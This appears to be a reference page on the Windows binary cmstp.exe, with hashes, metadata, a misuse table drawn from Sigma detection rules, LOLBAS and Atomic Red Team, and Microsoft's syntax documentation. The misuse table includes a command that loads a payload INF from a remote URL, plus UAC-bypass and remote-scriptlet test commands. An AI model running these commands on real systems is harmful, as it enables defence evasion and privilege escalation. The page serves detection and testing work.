cmstp.exe

  • File Path: C:\windows\SysWOW64\cmstp.exe
  • Description: Microsoft Connection Manager Profile Installer

Screenshot

cmstp.exe cmstp.exe

Hashes

Type Hash
MD5 A7C1632CE4B824C271A514F7D8C5042A
SHA1 44E9801B1D8D17EC64EDCD487175FE6705C7D586
SHA256 0BC5838C1A531114851B2DB02094856F786DA369FB69199D9E36EC71BA3CC04A
SHA384 D400A59556FD2183F04160B5984AF03A8026D594EAE9EF135A2844568DB83E5ACD4EDB86ED9A1A3F8933B6A2C143B18F
SHA512 DD26BF6F64565845286D085A9913BEC8A803A8F1B8AEFDE917585B45585F53DA201B8FFC371F7B37117A0524BCDEE278C623488B853A3DD500F80DAE1D495A76
SSDEEP 1536:PSsrp8ZxRrnuetUUzGsadLc8REmm/x+hbh5:P1rp8DRrna/dLqmm/xEh

Signature

  • Status: The file C:\windows\SysWOW64\cmstp.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
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File Metadata

  • Original Filename: CMSTP.EXE.MUI
  • Product Name: Microsoft(R) Connection Manager
  • Company Name: Microsoft Corporation
  • File Version: 7.02.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 7.02.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of cmstp.exe being misused. While cmstp.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_access_win_cmstp_execution_by_access.yml title: CMSTP Execution Process Access DRL 1.0
sigma proc_access_win_cmstp_execution_by_access.yml - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ DRL 1.0
sigma proc_access_win_cmstp_execution_by_access.yml - Legitimate CMSTP use (unlikely in modern enterprise environments) DRL 1.0
sigma proc_creation_win_cmstp_com_object_access.yml title: CMSTP UAC Bypass via COM Object Access DRL 1.0
sigma proc_creation_win_cmstp_com_object_access.yml - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ DRL 1.0
sigma proc_creation_win_cmstp_com_object_access.yml - Legitimate CMSTP use (unlikely in modern enterprise environments) DRL 1.0
sigma proc_creation_win_cmstp_execution_by_creation.yml title: CMSTP Execution Process Creation DRL 1.0
sigma proc_creation_win_cmstp_execution_by_creation.yml - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ DRL 1.0
sigma proc_creation_win_cmstp_execution_by_creation.yml - Legitimate CMSTP use (unlikely in modern enterprise environments) DRL 1.0
sigma proc_creation_win_cmstp_execution_by_creation.yml # CMSTP Spawning Child Process DRL 1.0
sigma proc_creation_win_cmstp_execution_by_creation.yml ParentImage\|endswith: '\cmstp.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'cmstp.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\cmstp.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'cmstp.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\cmstp.exe' DRL 1.0
sigma proc_creation_win_uac_cmstp.yml title: Bypass UAC via CMSTP DRL 1.0
sigma proc_creation_win_uac_cmstp.yml description: Detect child processes of automatically elevated instances of Microsoft Connection Manager Profile Installer (cmstp.exe). DRL 1.0
sigma proc_creation_win_uac_cmstp.yml Image\|endswith: '\cmstp.exe' DRL 1.0
sigma proc_creation_win_uac_cmstp.yml - Legitimate use of cmstp.exe utility by legitimate user DRL 1.0
sigma registry_event_cmstp_execution_by_registry.yml title: CMSTP Execution Registry Event DRL 1.0
sigma registry_event_cmstp_execution_by_registry.yml - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ DRL 1.0
sigma registry_event_cmstp_execution_by_registry.yml - Legitimate CMSTP use (unlikely in modern enterprise environments) DRL 1.0
LOLBAS Cmstp.yml Name: Cmstp.exe  
LOLBAS Cmstp.yml - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf  
LOLBAS Cmstp.yml - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf  
LOLBAS Cmstp.yml - Path: C:\Windows\System32\cmstp.exe  
LOLBAS Cmstp.yml - Path: C:\Windows\SysWOW64\cmstp.exe  
LOLBAS Cmstp.yml - IOC: Execution of cmstp.exe without a VPN use case is suspicious  
LOLBAS Cmstp.yml - IOC: DotNet CLR libraries loaded into cmstp.exe  
LOLBAS Cmstp.yml - IOC: DotNet CLR Usage Log - cmstp.exe.log  
LOLBAS Cmstp.yml - Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/  
LOLBAS Cmstp.yml - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp  
atomic-red-team index.md - T1218.003 CMSTP MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: CMSTP Executing UAC Bypass [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1218.003 CMSTP MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: CMSTP Executing UAC Bypass [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | Hardware Additions CONTRIBUTE A TEST | Deploy Container CONTRIBUTE A TEST | At (Linux) | At (Windows) | CMSTP | Credential Stuffing | Domain Account | Remote Desktop Protocol | Credential API Hooking | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Dead Drop Resolver CONTRIBUTE A TEST | Disk Structure Wipe CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | External Remote Services | Inter-Process Communication CONTRIBUTE A TEST | At (Windows) | Asynchronous Procedure Call | CMSTP | Credentials from Password Stores | File and Directory Discovery | RDP Hijacking | Clipboard Data | Exfiltration Over Physical Medium CONTRIBUTE A TEST | Data Encoding CONTRIBUTE A TEST | Direct Network Flood CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md # T1218.003 - CMSTP MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md <blockquote>Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md - Atomic Test #1 - CMSTP Executing Remote Scriptlet MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md - Atomic Test #2 - CMSTP Executing UAC Bypass MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md ## Atomic Test #1 - CMSTP Executing Remote Scriptlet MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md Adversaries may supply CMSTP.exe with INF files infected with malicious commands MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md cmstp.exe /s #{inf_file_path} MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md ## Atomic Test #2 - CMSTP Executing UAC Bypass MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md cmstp.exe /s #{inf_file_uac} /au MIT License. © 2018 Red Canary

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


cmstp

Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012

Installs or removes a Connection Manager service profile. Used without optional parameters, cmstp installs a service profile with default settings appropriate to the operating system and to the user’s permissions.

Syntax

Syntax 1 - This is the typical syntax used in a custom installation application. To use this syntax, you must run cmstp from the directory that contains the <serviceprofilefilename>.exe file.

<serviceprofilefilename>.exe /q:a /c:cmstp.exe <serviceprofilefilename>.inf [/nf] [/s] [/u]

Syntax 2

cmstp.exe [/nf] [/s] [/u] [drive:][path]serviceprofilefilename.inf
Parameters

| Parameter | Description | | ——— | ———– | | <serviceprofilefilename>.exe | Specifies, by name, the installation package that contains the profile that you want to install.<p>Required for Syntax 1, but not valid for Syntax 2. | | /q:a | Specifies that the profile should be installed without prompting the user. The verification message that the installation has succeeded will still appear.<p>Required for Syntax 1, but not valid for Syntax 2. | | [drive:][path] <serviceprofilefilename>.inf | Required. Specifies, by name, the configuration file that determines how the profile should be installed.<p>The [drive:][path] parameter isn’t valid for Syntax 1. | | /nf | Specifies that the support files should not be installed. | | /s | Specifies that the service profile should be installed or uninstalled silently (without prompting for user response or displaying verification message). This is the only parameter that you can use in combination with /u.| | /u | Specifies that the service profile should be uninstalled. | | /? | Displays help at the command prompt. |

Examples

To install the fiction service profile without any support files, type:

fiction.exe /c:cmstp.exe fiction.inf /nf

To silently install the fiction service profile for a single user, type:

fiction.exe /c:cmstp.exe fiction.inf /s /su

To silently uninstall the fiction service profile, type:

fiction.exe /c:cmstp.exe fiction.inf /s /u

Additional References


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